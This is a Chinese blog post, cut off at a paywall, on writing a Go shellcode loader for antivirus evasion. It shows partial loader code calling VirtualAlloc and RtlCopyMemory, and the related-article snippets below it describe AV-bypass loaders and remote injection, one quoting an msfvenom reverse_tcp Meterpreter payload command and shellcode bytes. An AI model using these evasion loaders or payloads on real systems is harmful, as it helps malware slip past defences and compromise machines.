基于Go加载shellcode

最新推荐文章于 2025-05-17 12:22:54 发布
最新推荐文章于 2025-05-17 12:22:54 发布
阅读量2.7k 收藏 8
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 免杀 文章标签: golang windows microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52091458/article/details/127448228

基于Go加载shellcode

这里通过TideSec的go免杀项目来从0开始学习

首先导个包,需要用到如下几个包。

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

  • io/ioutil 文件操作

  • os 系统操作

  • syscall syscall包含一个指向底层操作系统原语的接口

  • unsafe Go指针的操作非常有限,仅支持赋值和取值,不支持指针运算,可以通过unsafe包来达到效果

这里定义一下变量,然后需要通过syscall来加载两个dll,kernel32.dllntdll.dll

var (
	kernel32 = syscall.MustLoadDLL("kernel32.dll")
	ntdll = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
	shellcode_buf = []byte{
   
   
        shellcodedata
    }
)

然后这里有一个检查报错的函数,如果有报错就退出并打印报错信息。

func checkErr(err error) {
   
   
   if err != nil {
   
   
      if err.Error() != "The operation completed successfully." {
   
   
         println(err.Error())
         os.Exit(1)
      }
   }
}

然后来看下main函数,这里把shellcode赋值过来,然后有个if语句,这里的意思就是说当运行这个程序跟了参数的时候,就从第一个参数读取文件,把文件内容传给shellcode参数。

func main
最低0.47元/天 解锁文章

200万优质内容无限畅学
18、Go语言中的Shellcode生成与插件系统应用
kafka6courier的博客
07-16 12
本文详细探讨了在Go语言中生成Shellcode的技术以及如何利用Go的插件系统构建可扩展的安全工具。文章首先介绍了通过覆盖合法文件实现权限提升的攻击场景,接着深入讲解了使用msfvenom工具生成适用于Go的有效负载的不同转换格式,包括C转换、十六进制、数字格式、原始二进制和Base64编码。随后,文章讨论了Go语言对汇编的支持限制,并重点展示了如何在Go中构建插件化漏洞扫描器框架,通过动态加载插件实现灵活扩展。最后,文章总结了插件系统的优势、应用场景以及未来在安全领域的潜力,为开发者提供了进一步学习和研
18、Go语言中的Shellcode生成与插件开发
最新发布
mac99的博客
07-22 5
本文详细介绍了在Go语言中生成Shellcode的多种方法,包括C转换、十六进制转换、数字转换、原始转换和Base64编码,并分析了每种方法的优缺点和适用场景。同时,深入讲解了Go原生插件系统的使用,包括插件的编译、加载和调用,并演示了如何创建一个可插拔的漏洞扫描器。通过这些技术,开发者可以在Go语言中实现灵活且可扩展的安全工具和应用,为安全领域的开发工作提供有力支持。
go-shellcode:将Shellcode加载到新进程中
02-06
壳码 这是一个将shellcode作为自己的进程运行的程序,所有程序均来自内存。 这样做是为了击败反病毒检测。 用法 请记住,只有64位shellcode将在64位进程中运行。 这无法自动检测您的Shellcode架构。 使用msfvenom或metasploit以十六进制格式生成一些shellcode: $ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444 c:\windows\temp>sc.exe fce8820000006089e531c0648b5030
记一次Go语言的学习--shellcode加载器免杀
jjjjj34的博客
04-24 2972
在网上搜了很多关于Go语言的免杀,我也是刚学几天,就做个学习对于GO语言做免杀的记录。
Shellcode分离加载术:把“秘密”藏在更远的地方
仇辉攻防的博客
05-17 628
本文围绕 Shellcode 分离加载的核心思路,系统介绍本地文件、参数注入、远程请求等多种分阶段加载技术,并结合安全测试场景进行实践验证,帮助提升在合法演练中的抗检测能力。
go-shellcode:Windows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载和执行Shellcode
04-23
去壳代码 go-shellcodeWindows Shellcode运行程序和支持实用程序的存储库。 应用程序使用各种AP​​I调用或技术来加载和执行Shellcode。 可用的Shellcode运行程序包括: CreateFiber 该应用程序利用Kernel32.dll的Windows 函数在该应用程序的进程中执行shellcode。 当您希望避免远程进程注入并且希望避免调用CreateThread时,这很有用。 此应用程序不利用golang.org/x/sys/windows软件包中的功能。 最重要的区别是此应用程序本身会加载所有必需的DLL和过程,并使用过程的Call()函数。 注意:我还没有找到退出进程的方法,您将不得不手动终止它。 可以使用以下命令在Windows主机上从项目的根目录编译该应用程序: set GOOS=windows GOARCH=amd64;go
32.远控免杀专题(32)-Go加载shellcode免杀-3种方式(VT免杀率7-70)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
探索Windows Shellcode运行器:go-shellcode
gitblog_00090的博客
05-15 332
探索Windows Shellcode运行器:go-shellcode go-shellcodeA repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques.项...
gld:一种基于GoShellcode装载器技术解析
资源摘要信息:"gld:进入Shellcode Loader 是...最后,提到的标签‘windows bypass shellcode-loader Go’概括了gld的主要特点,即一个用Go语言编写的、用于在Windows环境下加载和执行绕过安全防御的shellcode的工具。
打造免杀shellcode加载器:绕过AV的实战指南
使用Go语言编写shellcode加载器和远控工具,可以在攻击者和安全研究者之间进行一场“猫鼠游戏”。 #### 5. shellcode编码与加载shellcode通常是一段用于执行恶意操作的二进制代码,攻击者通过注入shellcode来...
用C和Go语言加载shellcode
眼科住院医一枚,偶尔搞搞赛博朋克
02-26 1089
用C和Go语言加载shellcode
Go4aRun:GO中的Shellcode运行程序,其中包含shellcode加密,远程进程注入,阻止dll和欺骗性的父进程
03-20
Go4aRun 用法: 在hideit.goGo4it.go中更改用于加密的所需密码 在Go4it.go中更改行为选项 更改块dll行为:通过nonms和onlystore变量在“不允许非MS”和“仅存储”之间 更改parentName变量以更改欺骗的父级 更改programPath变量以更改由父级启动的进程,shellcode将注入该进程 更改creationFlags以更改programPath变量的启动行为 通过注释/取消注释部分CreateRemoteThread或QueueUserAPC选择一个过程注入方法 运行hideit(构建或运行)并选择原始shellcode文件 该脚本应将加密的shellcode保存在pkg / shelly中的shelly.go文件中(如果未手动移动到pkg / shelly中) 编译Go4it.go(例如:GOOS = windows GOARCH
绕过AV:免杀shellcode加载
03-04
旁路AV 条件触发式远控VT 6/70免杀国内杀软及后卫,卡巴斯基等主流杀软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
shellcode加载
10-02
22年9月最新,采用shellcode加密分离加载,支持msf和cs
Golang的Cobalt Strike Shellcode Loader-Golang开发
05-26
Cobalt Strike Shellcode Loader by Golang Doge-Loader Cobalt Strike Shellcode Loader by Golang 本人github的项目可能目前主要分为两大类, :frog: Frog系列为自动化扫描方向, :dog_face: Doge系列为免杀及内网渗透方向 Doge-Loader为Doge系列中较为重要的项目 :dog_face: 本项目感谢朋友gd, skate_zhu的帮助 :dog_face: Doge-Loader 本项目主要作用为Cobalt Strike的shellcode加载器 项目结构如下: main.go 主程序,用于远程下载shellcode加载(需要自行上传shellcode(bin文件)并且修改源码里的url等参数) xor.go 异或编码解码器 /enhancement 附加功能,主要用于免杀等(需自行在main.go中调用) /enhancement/copy.go 程序自删除与自复制 /enhancement/sandbox.go
免杀方法(五)golang加载器cobaltstrike shellcode
qq_56426046的博客
10-04 2129
Go语言目前是最火的编程语言之一,使用go语言编写的加载器,运行shellcode 可以过国内主流杀软,例如360安全卫士、360安全杀毒、火绒、瑞星、金山、 电脑管家。免杀效果很好。而且操作免杀的步骤简单。 项目地址https:/github.com/jax777/shellcode-launch Go语言编译器下载https:/studygolang.com/dlDownloads - The Go Programming Language安装go,下载安装包,傻瓜安装即可。解压下载的项目压缩包,新建6
golang
Shellcode.Cool!
02-28 860
推荐网站gravetee.com
Go-Shellcode-Bypass:一款创新的安全研究工具
gitblog_00019的博客
04-07 460
Go-Shellcode-Bypass:一款创新的安全研究工具 去发现同类优质开源项目:https://gitcode.com/ 是一个由Cuerz开发的开源项目,专注于在Go语言环境中实现shellcode的绕过技术。对于安全研究人员和渗透测试工程师而言,这是一个非常有价值的工具,因为它可以帮助他们更深入地理解并实践代码注入策略。 项目简介 该项目的核心是提供了一种方法,使得shellcode能...
shellcode弹出对话框
Linux方程式
11-11 3193
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Le1a

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值